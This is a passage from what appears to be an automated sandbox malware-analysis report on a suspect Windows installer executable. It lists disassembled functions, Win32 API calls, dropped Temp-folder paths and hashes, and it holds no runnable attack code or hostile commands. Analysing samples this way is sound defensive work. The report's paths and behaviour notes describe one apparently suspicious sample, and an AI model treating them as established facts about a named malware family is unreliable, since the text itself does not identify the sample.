                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                                    Function 00404048 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00403E24), ref: 00404052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                    • Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                                                                                                                                                                    • Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 00404A09 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404A21
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404A2C
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
                                                                                                                                                                                    • LoadBitmapA.USER32(0000006E), ref: 00404A89
                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
                                                                                                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404ADE
                                                                                                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
                                                                                                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404AFF
                                                                                                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
                                                                                                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
                                                                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BF6
                                                                                                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404C39
                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404C58
                                                                                                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
                                                                                                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
                                                                                                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
                                                                                                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
                                                                                                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 00404E28
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00404E38
                                                                                                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
                                                                                                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F89
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404FD7
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404FE2
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404FE9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                                                                    • Opcode ID: 5f3c4739e10bdbc6f95dd4db3d934c78b0b3f0b6688006dd2a073d50567dd4f5
                                                                                                                                                                                    • Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f3c4739e10bdbc6f95dd4db3d934c78b0b3f0b6688006dd2a073d50567dd4f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58
                                                                                                                                                                                    Function 00404496 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004044E5
                                                                                                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040450F
                                                                                                                                                                                    • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004045CB
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(Call,benevolently Setup: Installing), ref: 004045FD
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,Call), ref: 00404609
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040461B
                                                                                                                                                                                      • Part of subcall function 00405665: GetDlgItemTextA.USER32(?,?,00000400,00404652), ref: 00405678
                                                                                                                                                                                      • Part of subcall function 004061CF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                                                                                                                                                                                      • Part of subcall function 004061CF: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                                                                                                                                                                                      • Part of subcall function 004061CF: CharNextA.USER32(?,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                                                                                                                                                                                      • Part of subcall function 004061CF: CharPrevA.USER32(?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 004046D9
                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
                                                                                                                                                                                      • Part of subcall function 0040484D: lstrlenA.KERNEL32(benevolently Setup: Installing,benevolently Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                                                                                                                                                                                      • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
                                                                                                                                                                                      • Part of subcall function 0040484D: SetDlgItemTextA.USER32(?,benevolently Setup: Installing), ref: 00404906
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243$Call$benevolently Setup: Installing
                                                                                                                                                                                    • API String ID: 2624150263-3830329200
                                                                                                                                                                                    • Opcode ID: 253962bdf1ca56d496f286ca68f5b659c957982d53365147659bd32eacec062f
                                                                                                                                                                                    • Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
                                                                                                                                                                                    • Opcode Fuzzy Hash: 253962bdf1ca56d496f286ca68f5b659c957982d53365147659bd32eacec062f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D
                                                                                                                                                                                    Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4227406936-0
                                                                                                                                                                                    • Opcode ID: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                                                                                                                                                                    • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                                                                                                    Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes, xrefs: 0040218D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes
                                                                                                                                                                                    • API String ID: 123533781-1124679380
                                                                                                                                                                                    • Opcode ID: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                                                                                                                                                                                    • Instruction ID: 70e90dd273e36d6cf470b0c6c9ff695bb876e65ea6d8ae05c01ad1deac9bcbee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9512775A00208BFCF10DFE4C988A9DBBB5EF48318F2045AAF915EB2D1DA799941CF14
                                                                                                                                                                                    Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                    • Opcode ID: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                                                                                                                                                                                    • Instruction ID: 5589ad20af1132df25b1d4da55578e461c11660e8300270abb34f4e41d1b37c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF0A0726041119AD710E7B49999EEEB778DB21324F60057BE685F20C1C6B88A469B2A
                                                                                                                                                                                    Function 00406742 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                                                                                                                                                    • Instruction ID: 12ef56279526f9f53f22afc89151adbe845766d01d6fb7ada6890335ffbed449
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE19A7190070ADFCB24CF58C980BAABBF1EB45305F15852EE497A72D1E338AA91CF44
                                                                                                                                                                                    Function 00406F19 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                                                                                                                                                    • Instruction ID: 968ea090ea57439d934916100a42e081e4144f1e312078ddc892fc3721ce49e9
                                                                                                                                                                                    • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C14A31E0421ACBCF14CF68D4905EEBBB2BF99314F25866AD8567B380D734A942CF95
                                                                                                                                                                                    Function 0040416F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FA
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 0040420E
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040422C
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 0040423D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040425E
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004042E4
                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 004042E7
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404312
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00404361
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040436A
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00404380
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404383
                                                                                                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043AF
                                                                                                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
